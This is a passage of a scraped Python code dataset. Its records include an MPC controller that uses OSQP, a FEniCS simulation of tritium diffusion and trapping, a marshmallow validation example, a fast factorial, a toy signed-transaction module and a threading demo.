sparse.vstack((sparse.csc_matrix((self.nx, (self.N + 1) * self.nx)),\n sparse.hstack((\n sparse.block_diag(A_lst), sparse.csc_matrix((self.N * self.nx, 
self.nx))))))\n Ax = -sparse.eye((self.N + 1) * self.nx) + A_dyn\n Bu = sparse.vstack((sparse.csc_matrix((self.nx, self.N * self.nu)),\n sparse.block_diag(B_lst)))\n\n if not self.add_slack:\n # Input constraints:\n Aineq_u = sparse.hstack(\n [sparse.csc_matrix((self.N * self.nu, (self.N + 1) * self.nx)),\n sparse.eye(self.N * self.nu)])\n\n # State constraints:\n Aineq_x = sparse.hstack([sparse.kron(sparse.eye(self.N + 1), self.C_x),\n sparse.csc_matrix(((self.N + 1) * self.ns, self.N * self.nu))])\n\n Aeq = sparse.hstack([Ax, Bu])\n else:\n # Input constraints:\n Aineq_u = sparse.hstack(\n [sparse.csc_matrix((self.N * self.nu, (self.N + 1) * self.nx)),\n sparse.eye(self.N * self.nu),\n sparse.csc_matrix((self.nu * self.N, self.ns * self.N))])\n\n # State constraints:\n Aineq_x = sparse.hstack([sparse.kron(sparse.eye(self.N + 1), self.C_x),\n sparse.csc_matrix(((self.N + 1) * self.ns, self.N * self.nu)),\n sparse.vstack([sparse.eye(self.ns * self.N),\n sparse.csc_matrix((self.ns, self.ns * self.N))])])\n\n Aeq = sparse.hstack([Ax, Bu, sparse.csc_matrix((self.nx * (self.N + 1), self.ns * (self.N)))])\n\n self._osqp_A = sparse.vstack([Aeq, Aineq_u, Aineq_x], format='csc')\n\n def construct_constraint_matrix_data_(self, A_lst, B_lst):\n \"\"\"\n Manually build csc_matrix.data array\n :param A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n :param B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n :return:\n \"\"\"\n C_data = [np.atleast_1d(self.C_x_dense[np.nonzero(self.C_x_dense[:, i]), i].squeeze()).tolist() for i in range(self.nx)]\n\n # State variables:\n data = []\n A_inds = []\n start_ind_A = 1\n for t in range(self.N):\n for i in range(self.nx):\n data.append(np.hstack((-np.ones(1), A_lst[t][:, i], np.array(C_data[i]))))\n A_inds.append(np.arange(start_ind_A, start_ind_A + self.nx))\n start_ind_A += self.nx + 1 + len(C_data[i])\n\n for i in range(self.nx):\n data.append(np.hstack((-np.ones(1), np.array(C_data[i]))))\n\n # Input variables:\n B_inds = []\n start_ind_B = start_ind_A + self.nx + np.nonzero(self.C_x_dense)[0].size - 1\n for t in range(self.N):\n for i in range(self.nu):\n data.append(np.hstack((B_lst[t][:, i], np.ones(1))))\n B_inds.append(np.arange(start_ind_B, start_ind_B + self.nx))\n start_ind_B += self.nx + 1\n\n # Slack variables:\n if self.add_slack:\n for t in range(self.N):\n for i in range(self.ns):\n data.append(np.ones(1))\n\n flat_data = []\n for arr in data:\n for d in arr:\n flat_data.append(d)\n\n self._osqp_A_data = np.array(flat_data)\n self._osqp_A_data_A_inds = np.array(A_inds).flatten().tolist()\n self._osqp_A_data_B_inds = np.array(B_inds).flatten().tolist()\n\n def update_constraint_matrix_data_(self):\n \"\"\"\n Manually update csc_matrix.data array\n :param A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n :param B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n :return:\n \"\"\"\n #self._osqp_A_data[self._osqp_A_data_A_inds] = self.A_stacked.flatten(order='F')\n #self._osqp_A_data[self._osqp_A_data_B_inds] = self.B_stacked.flatten(order='F')\n self._osqp_A_data[self._osqp_A_data_A_inds] = self.A_stacked\n self._osqp_A_data[self._osqp_A_data_B_inds] = self.B_stacked\n\n def construct_constraint_vecs_(self, z, t):\n \"\"\"\n Construct MPC constraint vectors (lower and upper bounds)\n :param z: (np.array) Current state\n :param t: (float) Current time 
(for time-dependent dynamics)\n :return:\n \"\"\"\n\n self.n_opt_x = self.nx * (self.N + 1)\n self.n_opt_x_u = self.nx * (self.N + 1) + self.nu * self.N\n\n dz0 = z - self.z_init[:, 0]\n leq = np.hstack([-dz0, -self.r_vec])\n ueq = leq\n\n # Input constraints:\n u_init_flat = self.u_init.flatten(order='F') # TODO: Check flattening ok\n self.umin_tiled = np.tile(self.umin, self.N)\n self.umax_tiled = np.tile(self.umax, self.N)\n lineq_u = self.umin_tiled - u_init_flat\n uineq_u = self.umax_tiled - u_init_flat\n\n # State constraints:\n x_init_flat = self.x_init.flatten(order='F')\n self.xmin_tiled = np.tile(self.xmin, self.N + 1)\n self.xmax_tiled = np.tile(self.xmax, self.N + 1)\n lineq_x = self.xmin_tiled - x_init_flat\n uineq_x = self.xmax_tiled - x_init_flat\n\n if self.terminal_constraint:\n raise Warning('Terminal constraint not implemented.')\n #lineq_x[-self.ns:] = self.xr - self.x_init[:, -1]\n #uineq_x[-self.ns:] = lineq_x[-self.ns:]\n\n self._osqp_l = np.hstack([leq, lineq_u, lineq_x])\n self._osqp_u = np.hstack([ueq, uineq_u, uineq_x])\n\n def update_constraint_vecs_(self, z, t):\n \"\"\"\n Update MPC constraint vectors (lower and upper bounds)\n :param z: (np.array) Current state\n :param t: (float) Current time (for time-dependent dynamics)\n :return:\n \"\"\"\n # Equality constraints:\n self._osqp_l[:self.nx] = -(z - self.z_init[:, 0])\n self._osqp_l[self.nx:self.nx * (self.N + 1)] = -self.r_vec\n\n self._osqp_u[:self.nx * (self.N + 1)] = self._osqp_l[:self.nx * (self.N + 1)]\n\n # Input constraints:\n self._osqp_l[self.n_opt_x:self.n_opt_x_u] = self.umin_tiled - self.u_init_flat\n self._osqp_u[self.n_opt_x:self.n_opt_x_u] = self.umax_tiled - self.u_init_flat\n\n # State constraints:\n self._osqp_l[self.n_opt_x_u:] = self.xmin_tiled - self.x_init_flat\n self._osqp_u[self.n_opt_x_u:] = self.xmax_tiled - self.x_init_flat\n\n if self.terminal_constraint:\n raise Warning('Terminal constraint not implemented.')\n #self._osqp_l[-self.ns:] = self.xr - self.x_init_flat[-self.ns:]\n #self._osqp_u[-self.ns:] = self._osqp_l[-self.ns:]\n\n def solve_mpc_(self):\n \"\"\"\n Solve the MPC sub-problem\n :return:\n \"\"\"\n if self.solver_settings['gen_embedded_ctrl']:\n self.prob_embed.update_lin_cost(self._osqp_q)\n self.prob_embed.update_lower_bound(self._osqp_l)\n self.prob_embed.update_upper_bound(self._osqp_u)\n self.prob_embed.update_A(self._osqp_A_data, None, 0)\n self.res = self.prob_embed.solve()\n self.dz_flat = self.res[0][:(self.N + 1) * self.nx]\n self.du_flat = self.res[0][(self.N + 1) * self.nx:(self.N + 1) * self.nx + self.nu * self.N]\n\n else:\n self.prob.update(q=self._osqp_q, Ax=self._osqp_A_data, l=self._osqp_l, u=self._osqp_u)\n self.res = self.prob.solve()\n self.dz_flat = self.res.x[:(self.N + 1) * self.nx]\n self.du_flat = self.res.x[(self.N + 1) * self.nx:(self.N + 1) * self.nx + self.nu * self.N]\n\n# if self.res.info.status != 'solved':\n# raise ValueError('OSQP did not solve the problem!', self.res.info.status)\n\n def update_initial_guess_(self):\n \"\"\"\n Update the intial guess of the solution (z_init, u_init)\n :return:\n \"\"\"\n z_last = self.cur_z[:, -1]\n u_new = self.cur_u[:, -1]\n z_new = self.dynamics_object.eval_dot(z_last, u_new, None)\n\n self.z_init[:, :-1] = self.cur_z[:, 1:]\n self.z_init[:, -1] = z_new\n\n self.u_init[:, :-1] = self.cur_u[:, 1:]\n self.u_init[:, -1] = u_new\n self.u_init_flat[:-self.nu] = self.u_init_flat[self.nu:]\n self.u_init_flat[-self.nu:] = u_new\n\n self.x_init = self.C_x_dense @ self.z_init\n self.x_init_flat = 
self.x_init.flatten(order='F')\n\n # Warm start of OSQP:\n #du_new = self.du_flat[-self.nu:]\n #dz_last = self.dz_flat[-self.nx:]\n #dz_new = self.dynamics_object.eval_dot(dz_last, du_new, None)\n #self.warm_start[:self.nx*self.N] = self.dz_flat[self.nx:]\n #self.warm_start[self.nx*self.N:self.nx*(self.N+1)] = dz_new\n #self.warm_start[self.nx*(self.N+1):-self.nu] = self.du_flat[self.nu:]\n #self.warm_start[-self.nu:] = du_new\n\n def update_linearization_(self):\n \"\"\"\n Update the linearization of the dynamics around the initial guess\n :return: A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n \"\"\"\n for ii in range(self.N):\n a, b, r = self.dynamics_object.get_linearization(self.z_init[:, ii], self.z_init[:, ii + 1],\n self.u_init[:, ii], None)\n self.A_stacked[ii*self.nx**2:(ii+1)*self.nx**2] = a.flatten(order='F')\n self.B_stacked[ii * self.nx *self.nu:(ii + 1) * self.nx*self.nu] = b.flatten(order='F')\n self.r_vec[ii*self.nx:(ii+1)*self.nx] = r\n\n def construct_embedded_controller(self):\n try:\n self.prob_embed = importlib.import_module(self.embed_pkg_str)\n except ModuleNotFoundError:\n file_path = os.path.dirname(os.path.realpath(__file__)) + '/embedded_controllers/' + self.embed_pkg_str\n self.prob.codegen(file_path, parameters='matrices', python_ext_name=self.embed_pkg_str, force_rewrite=True)\n self.prob_embed = importlib.import_module(self.embed_pkg_str)\n\n def get_state_prediction(self):\n \"\"\"\n Get the state prediction from the MPC problem\n :return: Z (np.array) current state prediction\n \"\"\"\n return self.cur_z\n\n def get_control_prediction(self):\n \"\"\"\n Get the control prediction from the MPC problem\n :return: U (np.array) current control prediction\n \"\"\"\n return self.cur_u\n\n def initialize_numba(self, x, t):\n \"\"\"\n Initialize Numba compilation of online controller components:\n \"\"\"\n\n self.prepare_eval(0.)\n self.eval(x, t)\n self.comp_time = []\n self.prep_time = []\n\n","sub_path":"koopman_core/controllers/nmpc_traj_controller_numba.py","file_name":"nmpc_traj_controller_numba.py","file_ext":"py","file_size_in_byte":27539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
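One detail worth noting in the record above: the njit helper _update_current_sol undoes a Fortran-order flatten with a C-order reshape plus a transpose. A small numpy check that the two layouts agree (the shapes are illustrative):

```python
import numpy as np

nx, N = 3, 4
z = np.arange(nx * (N + 1)).reshape(nx, N + 1)
flat = z.flatten(order='F')   # column-major flatten, as in the controller
# C-order reshape + transpose recovers the original (nx, N+1) array
assert np.array_equal(flat.reshape(N + 1, nx).T, z)
assert np.array_equal(flat.reshape(nx, N + 1, order='F'), z)
```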
+{"seq_id":"619469232","text":"from fenics import *\nfrom dolfin import *\nimport numpy as np\nimport csv\nimport sys\nimport os\nimport argparse\n\n\ndef save_as():\n '''\n - parameters : none\n - returns filedescription : string of the saving path\n '''\n valid = False\n while valid is False:\n print(\"Save as (.csv):\")\n filedesorption = input()\n if filedesorption == '':\n filedesorption = \"desorption.csv\"\n if filedesorption.endswith('.csv'):\n valid = True\n try:\n with open(filedesorption, 'r') as f:\n print('This file already exists.'\n ' Do you want to replace it ? (y/n)')\n choice = input()\n if choice == \"n\" or choice == \"N\":\n valid = False\n elif choice != \"y\" and choice != \"Y\":\n valid = False\n except:\n valid = True\n else:\n print(\"Please enter a file ending with the extension .csv\")\n valid = False\n return filedesorption\n\n\ndef export_TDS(filedesorption):\n '''\n - filedesorption : string, the path of the csv file.\n '''\n busy = True\n while busy is True:\n try:\n with open(filedesorption, \"w+\") as output:\n busy = False\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows(['dTt'])\n for val in desorption:\n writer.writerows([val])\n except:\n print(\"The file \" + filedesorption + \" is currently busy.\"\n \"Please close the application then press any key\")\n input()\n return\n\n\ndef calculate_D(T, E, D_0):\n '''\n Calculate the diffusion coeff at a certain temperature\n and for a specific material (subdomain)\n Arguments:\n - T : float, temperature\n - E : float, diffusion energy\n - D_0 : float, diffusion pre-exponential factor\n Returns : float, the diffusion coefficient\n '''\n coefficient = D_0 * exp(-E/k_B/T)\n\n return coefficient\n\n\ndef update_D(mesh, volume_markers, materials, T):\n '''\n Iterates through the mesh and compute the value of D\n Arguments:\n - mesh : the mesh\n - volume_markers : MeshFunction that contains the subdomains\n - T : float, the temperature\n Returns : the Function D\n '''\n D = Function(V0)\n for cell in cells(mesh):\n volume_id = volume_markers[cell]\n found = False\n for material in materials:\n if volume_id == material[\"id\"]:\n found = True\n D.vector()[cell.index()] = \\\n calculate_D(T, material['E_diff'], material['D_0'])\n break\n if found is False:\n print('Computing D: Volume ID not found')\n return D\n\n\ndef update_alpha(mesh, volume_markers, materials):\n '''\n Iterates through the mesh and compute the value of D\n Arguments:\n - mesh : the mesh\n - volume_markers : MeshFunction that contains the subdomains\n - materials : list, contains all the materials dictionaries\n\n Returns : the Function alpha\n '''\n alpha = Function(V0)\n for cell in cells(mesh):\n volume_id = volume_markers[cell]\n found = False\n for material in materials:\n if volume_id == material[\"id\"]:\n found = True\n alpha.vector()[cell.index()] = material['alpha']\n break\n if found is False:\n print('Computing alpha: Volume ID not found')\n return alpha\n\n\ndef update_beta(mesh, volume_markers, materials):\n '''\n Iterates through the mesh and compute the value of D\n Arguments:\n - mesh : the mesh\n - volume_markers : MeshFunction that contains the subdomains\n - materials : list, contains all the materials dictionaries\n\n Returns : the Function beta\n '''\n beta = Function(V0)\n for cell in cells(mesh):\n volume_id = volume_markers[cell]\n found = False\n for material in materials:\n if volume_id == material[\"id\"]:\n found = True\n beta.vector()[cell.index()] = material['beta']\n break\n if found is 
False:\n print('Computing beta: Volume ID not found')\n return beta\n\n\ndef formulation(traps, solutions, testfunctions, previous_solutions):\n ''' formulation takes traps as argument (list).\n Parameters:\n - traps : dict, contains the energy, density and domains\n of the traps\n - solutions : list, contains the solution fields\n - testfunctions : list, contains the testfunctions\n - previous_solutions : list, contains the previous solution fields\n\n Returns:\n - F : variational formulation\n '''\n transient_sol = ((u_1 - u_n1) / dt)*v_1*dx\n diff_sol = D*dot(grad(u_1), grad(v_1))*dx\n source_sol = - (1-r)*flux_*f*v_1*dx\n\n F = 0\n F += transient_sol + source_sol + diff_sol\n i = 1\n for trap in traps:\n trap_density = trap['density']\n energy = trap['energy']\n F += ((solutions[i] - previous_solutions[i]) / dt)*testfunctions[i]*dx\n if type(trap['materials']) is list:\n for subdomain in trap['materials']:\n F += - D/alpha/alpha/beta*u_1*(trap_density - solutions[i])*testfunctions[i]*dx(subdomain)\n F += v_0*exp(-energy/k_B/temp)*solutions[i]*testfunctions[i]*dx(subdomain)\n else:\n subdomain = trap['materials']\n F += - D/alpha/alpha/beta*u_1*(trap_density - solutions[i])*testfunctions[i]*dx(subdomain)\n F += v_0*exp(-energy/k_B/temp)*solutions[i]*testfunctions[i]*dx(subdomain)\n F += ((solutions[i] - previous_solutions[i]) / dt)*v_1*dx\n i += 1\n return F\n\n\ndef subdomains(mesh, materials):\n '''\n Iterates through the mesh and mark them\n based on their position in the domain\n Arguments:\n - mesh : the mesh\n - materials : list, contains the dictionaries of the materials\n Returns :\n - volume_markers : MeshFunction that contains the subdomains\n (0 if no domain was found)\n - measurement : the measurement dx based on volume_markers\n '''\n volume_markers = MeshFunction(\"size_t\", mesh, mesh.topology().dim(), 0)\n for cell in cells(mesh):\n for material in materials:\n if cell.midpoint().x() >= material['borders'][0] \\\n and cell.midpoint().x() <= material['borders'][1]:\n volume_markers[cell] = material['id']\n\n measurement = dx(subdomain_data=volume_markers)\n return volume_markers, measurement\n\n\ndef define_materials():\n '''\n Create a list of dicts corresponding to the different materials\n and containing properties.\n Returns:\n -materials : list of dicts corresponding to the different materials\n and containing properties.\n '''\n materials = []\n material1 = {\n \"alpha\": Constant(1.1e-10), # lattice constant ()\n \"beta\": Constant(6*6.3e28), # number of solute sites per atom (6 for W)\n \"density\": 6.3e28,\n \"borders\": [0, 0.25e-6],\n \"E_diff\": 0.39,\n \"D_0\": 4.1e-7,\n \"id\": 1\n }\n material2 = {\n \"alpha\": Constant(1.1e-10),\n \"beta\": Constant(6*6.3e28),\n \"density\": 6.3e28,\n \"borders\": [0.25e-6, size],\n \"E_diff\": 0.39,\n \"D_0\": 4.1e-7,\n \"id\": 2\n }\n materials = [material1, material2]\n return materials\n\n\ndef define_traps(n_trap_3_n):\n '''\n Create a list of dicts corresponding to the different traps\n and containing properties.\n Arguments:\n - n_trap_3_n : Function(W), only required if extrinsic trap is\n simulated.\n Returns:\n -materials : list of dicts corresponding to the different traps\n and containing properties.\n '''\n trap_1 = {\n \"energy\": 0.87,\n \"density\": 1.3e-3*6.3e28,\n \"materials\": [1, 2]\n }\n trap_2 = {\n \"energy\": 1.0,\n \"density\": 4e-4*6.3e28,\n \"materials\": [1, 2]\n }\n trap_3 = {\n \"energy\": 1.5,\n \"density\": n_trap_3_,\n \"materials\": [1, 2]\n }\n\n traps = [trap_1, trap_2, trap_3]\n return 
traps\n\n\ndef mesh_and_refine(mesh_parameters):\n '''\n Mesh and refine iteratively until meeting the refinement\n conditions.\n Arguments:\n - mesh_parameters : dict, contains initial number of cells, size,\n and refinements (number of cells and position)\n Returns:\n - mesh : the refined mesh.\n '''\n print('Meshing ...')\n initial_number_of_cells = mesh_parameters[\"initial_number_of_cells\"]\n size = mesh_parameters[\"size\"]\n mesh = IntervalMesh(initial_number_of_cells, 0, size)\n if \"refinements\" in mesh_parameters:\n for refinement in mesh_parameters[\"refinements\"]:\n nb_cells_ref = refinement[\"cells\"]\n refinement_point = refinement[\"x\"]\n print(\"Mesh size before local refinement is \" + str(len(mesh.cells())))\n while len(mesh.cells()) < initial_number_of_cells + nb_cells_ref:\n cell_markers = MeshFunction(\"bool\", mesh, mesh.topology().dim())\n cell_markers.set_all(False)\n for cell in cells(mesh):\n if cell.midpoint().x() < refinement_point:\n cell_markers[cell] = True\n mesh = refine(mesh, cell_markers)\n print(\"Mesh size after local refinement is \" + str(len(mesh.cells())))\n initial_number_of_cells = len(mesh.cells())\n else:\n print('No refinement parameters found')\n\n return mesh\n\n\n# Declaration of variables\n\nmesh_parameters = {\n \"initial_number_of_cells\": 20,\n \"size\": 20e-6,\n \"refinements\": [\n {\n \"cells\": 1500,\n \"x\": 3e-6\n },\n {\n \"cells\": 100,\n \"x\": 10e-9\n }\n ],\n }\nimplantation_time = 400.0\nresting_time = 50\nramp = 8\ndelta_TDS = 500\nr = 0\nflux = 2.5e19 # /6.3e28\nn_trap_3a_max = 1e-1*Constant(6.3e28)\nn_trap_3b_max = 1e-2*Constant(6.3e28)\nrate_3a = 6e-4\nrate_3b = 2e-4\nxp = 1e-6\nsize = mesh_parameters[\"size\"]\n\nv_0 = 1e13 # frequency factor s-1\nk_B = 8.6e-5 # Boltzmann constant\n\n# Mesh and refinement\nmaterials = define_materials()\n\nTDS_time = int(delta_TDS / ramp) + 1\nTime = implantation_time+resting_time+TDS_time\nnum_steps = 2*int(implantation_time+resting_time+TDS_time)\nk = Time / num_steps # time step size\ndt = Constant(k)\nt = 0 # Initialising time to 0s\n\nmesh = mesh_and_refine(mesh_parameters)\n# Define function space for system of concentrations and properties\nP1 = FiniteElement('P', interval, 1)\nelement = MixedElement([P1, P1, P1, P1])\nV = FunctionSpace(mesh, element)\nW = FunctionSpace(mesh, 'P', 1)\nV0 = FunctionSpace(mesh, 'DG', 0)\n\n# Define and mark subdomains\nvolume_markers, dx = subdomains(mesh, materials)\n\n# BCs\nprint('Defining boundary conditions')\n\n\ndef inside(x, on_boundary):\n return on_boundary and (near(x[0], 0))\n\n\ndef outside(x, on_boundary):\n return on_boundary and (near(x[0], size))\n# #Tritium concentration\ninside_bc_c = Expression(('0', '0', '0', '0'), t=0, degree=1)\nbci_c = DirichletBC(V, inside_bc_c, inside)\nbco_c = DirichletBC(V, inside_bc_c, outside)\nbcs = [bci_c, bco_c]\n\n\n# Define test functions\nv_1, v_2, v_3, v_4 = TestFunctions(V)\ntestfunctions = [v_1, v_2, v_3, v_4]\nv_trap_3 = TestFunction(W)\n\nu = Function(V)\nn_trap_3 = TrialFunction(W) # trap 3 density\n\n# Split system functions to access components\nu_1, u_2, u_3, u_4 = split(u)\nsolutions = [u_1, u_2, u_3, u_4]\n\nprint('Defining initial values')\nini_u = Expression((\"0\", \"0\", \"0\", \"0\"), degree=1)\nu_n = interpolate(ini_u, V)\nu_n1, u_n2, u_n3, u_n4 = split(u_n)\nprevious_solutions = [u_n1, u_n2, u_n3, u_n4]\n\nini_n_trap_3 = Expression(\"0\", degree=1)\nn_trap_3_n = interpolate(ini_n_trap_3, W)\nn_trap_3_ = Function(W)\n\n# Define expressions used in variational 
forms\nprint('Defining source terms')\nf = Expression('1/(2.5e-9*pow(2*3.14,0.5))* \\\n exp(-0.5*pow(((x[0]-4.5e-9)/2.5e-9), 2))',\n degree=2) # This is the tritium volumetric source term\nteta = Expression('x[0] < xp ? 1/xp : 0',\n xp=xp, degree=1)\nflux_ = Expression('t <= implantation_time ? flux : 0',\n t=0, implantation_time=implantation_time,\n flux=flux, degree=1)\n\nprint('Defining variational problem')\ntemp = Expression('t <= (implantation_time+resting_time) ? \\\n 300 : 300+ramp*(t-(implantation_time+resting_time))',\n implantation_time=implantation_time,\n resting_time=resting_time,\n ramp=ramp,\n t=0, degree=2)\nD = update_D(mesh, volume_markers, materials, temp(size/2))\nalpha = update_alpha(mesh, volume_markers, materials)\nbeta = update_beta(mesh, volume_markers, materials)\n\ntraps = define_traps(n_trap_3_)\n\n# Define variational problem\n\nF = formulation(traps, solutions, testfunctions, previous_solutions)\n\nF_n3 = ((n_trap_3 - n_trap_3_n)/dt)*v_trap_3*dx\nF_n3 += -(1-r)*flux_*((1 - n_trap_3_n/n_trap_3a_max)*rate_3a*f + (1 - n_trap_3_n/n_trap_3b_max)*rate_3b*teta)*v_trap_3 * dx\n\n# Solution files\nxdmf_u_1 = XDMFFile('Solution/c_sol.xdmf')\nxdmf_u_2 = XDMFFile('Solution/c_trap1.xdmf')\nxdmf_u_3 = XDMFFile('Solution/c_trap2.xdmf')\nxdmf_u_4 = XDMFFile('Solution/c_trap3.xdmf')\nfiledesorption = save_as()\n\n# Time-stepping\nprint('Time stepping...')\ntotal_n = 0\ndesorption = list()\n\nset_log_level(30) # Set the log level to WARNING\n#set_log_level(20) # Set the log level to INFO\n\n\nfor n in range(num_steps):\n # Update current time\n t += k\n temp.t += k\n flux_.t += k\n if t > implantation_time:\n D = update_D(mesh, volume_markers, materials, temp(size/2))\n print(str(round(t/Time*100, 2)) + ' % ' + str(round(t, 1)) + ' s',\n end=\"\\r\")\n solve(F == 0, u, bcs,\n solver_parameters={\"newton_solver\": {\"absolute_tolerance\": 1e-19}})\n\n solve(lhs(F_n3) == rhs(F_n3), n_trap_3_, [])\n _u_1, _u_2, _u_3, _u_4 = u.split()\n\n # Save solution to file (.xdmf)\n _u_1.rename(\"solute\", \"label\")\n _u_2.rename(\"trap_1\", \"label\")\n _u_3.rename(\"trap_2\", \"label\")\n _u_4.rename(\"trap_3\", \"label\")\n xdmf_u_1.write(_u_1, t)\n xdmf_u_2.write(_u_2, t)\n xdmf_u_3.write(_u_3, t)\n xdmf_u_4.write(_u_4, t)\n\n total_trap1 = assemble(_u_2*dx)\n total_trap2 = assemble(_u_3*dx)\n total_trap3 = assemble(_u_4*dx)\n total_trap = total_trap1 + total_trap2 + total_trap3\n total_sol = assemble(_u_1*dx)\n total = total_trap + total_sol\n desorption_rate = [-(total-total_n)/k, temp(size/2), t]\n total_n = total\n if t > implantation_time+resting_time:\n desorption.append(desorption_rate)\n\n # Update previous solutions\n u_n.assign(u)\n n_trap_3_n.assign(n_trap_3_)\n\nexport_TDS(filedesorption)\n","sub_path":"Main/ttrap.py","file_name":"ttrap.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
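calculate_D in the script above is a plain Arrhenius law, D = D_0 * exp(-E_diff / (k_B * T)). Evaluated with the tungsten values from the material dicts, it gives a quick sanity check that needs no FEniCS (the temperature below is illustrative):

```python
from math import exp

k_B = 8.6e-5                  # Boltzmann constant in eV/K, as in the script
D_0, E_diff = 4.1e-7, 0.39    # tungsten values from the material dicts
T = 300.0                     # room temperature, K

D = D_0 * exp(-E_diff / (k_B * T))
print(D)   # roughly 1.1e-13 m^2/s
```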
+{"seq_id":"557564889","text":"import unittest\nfrom macros.models import query_cache\nfrom macros.libs import wa_processing\nfrom macros.libs import wap\nfrom macros.settings import test_settings\n\nclass TestNutritionExtractor:\n \n def setUp(self):\n self.Session, self.engine = db_connect(app_settings=test_settings)\n newQuery = query_cache.QueryCacheModel(\"my Q\", \"my Response\")\n Base.metadata.drop_all(self.engine)\n Base.metadata.create_all(self.engine)\n self.session = self.Session()\n self.session.add(newQuery)\n self.session.commit()\n\n def test_read_from_cache(self):\n \"\"\"Check if a query is in the cache\"\"\"\n return\n\n def tearDown(self):\n Base.metadata.drop_all(self.engine)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"macros/tests/libs/test_extractor.py","file_name":"test_extractor.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"568621856","text":"from marshmallow import ValidationError, fields, Schema, post_load\n\n\nclass User:\n\n def __init__(self, name, email, created_at):\n self.name = name\n self.email = email\n self.created_at = created_at\n\n\nclass UserSchema(Schema):\n name = fields.Str()\n email = fields.Email()\n created_at = fields.DateTime()\n\n @post_load\n def make_user(self, data, **kwargs):\n return User(**data)\n\ntry:\n result = UserSchema().load({\"name\": \"John\", \"email\": \"foo\"})\nexcept ValidationError as err:\n print(err.messages) # => {\"email\": ['\"foo\" is not a valid email address.']}\n print(err.valid_data) # => {\"name\": \"John\"}","sub_path":"test/test_marshmallow/test_validate_err.py","file_name":"test_validate_err.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"222945391","text":"import functools\nimport operator\n\nproduct = functools.partial(functools.reduce, operator.mul)\n\ndef factorial(n):\n \"\"\"Implementation of Binary-Split Factorial algorithm\n\n See http://www.luschny.de/math/factorial/binarysplitfact.html\n\n >>> f = 1\n >>> for n in range(1, 1001):\n ... f *= n\n ... assert(factorial(n) == f)\n \"\"\"\n if n < 3:\n return [1, 1, 2][n]\n _, r = loop(n)\n return r << (n - count_bits(n))\n\ndef loop_iter(n):\n p = r = 1\n s = n.bit_length() - 2\n i = s - 1 + (n >> s & 1)\n while i >= 0:\n m = n >> i\n p *= partial_product((m >> 2) + (m >> 1 & 1), \n (m >> 1) + (m & 1))\n r *= p\n i -= 1\n return p, r\n\ndef loop(n):\n p = r = 1\n if n > 2:\n p, r = loop(n >> 1)\n p *= partial_product((n >> 2) + (n >> 1 & 1), \n (n >> 1) + (n & 1))\n r *= p\n assert(n < 3 or (p, r) == loop_iter(n)) \n return p, r\n\ndef partial_product(start, stop):\n length = stop - start\n if length == 1:\n return start << 1 | 1\n if length == 2:\n x = (start << 1 | 1)\n return x * (x + 2)\n middle = start + (length >> 1) \n return partial_product(start, middle) * partial_product(middle, stop)\n\ndef count_bits(n):\n return bin(n).count('1')\n\nif __name__ == '__main__':\n print(factorial(10))\n","sub_path":"raw/fast_factorial.py","file_name":"fast_factorial.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"421163789","text":"from twofish import Twofish\nimport pickle\nimport secrets\nfrom transactions import transaction\nfrom wallets import ed25519_wallet as wallet\n\ndef payload(*args):\n return {\n 'to' : args[0],\n 'from' : args[1],\n 'amount' : args[2]\n }\n\ndef metadata(payload, s):\n payload = pickle.dumps(payload)\n return {\n 'signature' : wallet.sign(s, payload),\n 'proof' : find_nonce(payload)[0]\n }\n\ndef build(**kwargs):\n to = kwargs['to']\n v = kwargs['v']\n amount = kwargs['amount']\n s = kwargs['s']\n\n p = payload(to, v, amount)\n m = metadata(p, s)\n return {\n 'payload' : p,\n 'metadata' : m\n }\n\ndef find_nonce(o):\n T = Twofish(o[0:32])\n x = secrets.token_bytes(16)\n secret = secrets.token_bytes(16)\n while x.hex()[0:3] != '000':\n secret = secrets.token_bytes(16)\n x = T.encrypt(secret)\n\n return secret.hex(), x.hex()\n\ndef check_proof(o, proof):\n o = pickle.dumps(o)\n T = Twofish(o[0:32])\n x = T.encrypt(bytes.fromhex(proof))\n if x.hex()[0:3] == '000':\n return True\n return False","sub_path":"transactions/ed25519_transaction.py","file_name":"ed25519_transaction.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"152622423","text":"# coding=utf-8\nfrom threading import Thread,Lock\nimport time\n\nlock1 = Lock()\nlock2 = Lock()\nlock2.acquire()\nlock3 = Lock()\nlock3.acquire()\n\nclass Task1(Thread):\n def run(self):\n while True:\n if(lock1.acquire()):\n print('task1 -run')\n time.sleep(0.3)\n lock2.release()\n\nclass Task2(Thread):\n def run(self):\n while True:\n if(lock2.acquire()):\n print('task2 -run')\n time.sleep(0.3)\n lock3.release()\n\nclass Task3(Thread):\n def run(self):\n while True:\n if(lock3.acquire()):\n print('task3 -run')\n time.sleep(0.3)\n lock1.release()\n\n\nif __name__ == '__main__':\n t1 = Task1()\n t2 = Task2()\n t3 = Task3()\n t1.start()\n t2.start()\n t3.start()","sub_path":"code/01.多线程/08.多个线程按顺序执行.py","file_name":"08.多个线程按顺序执行.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
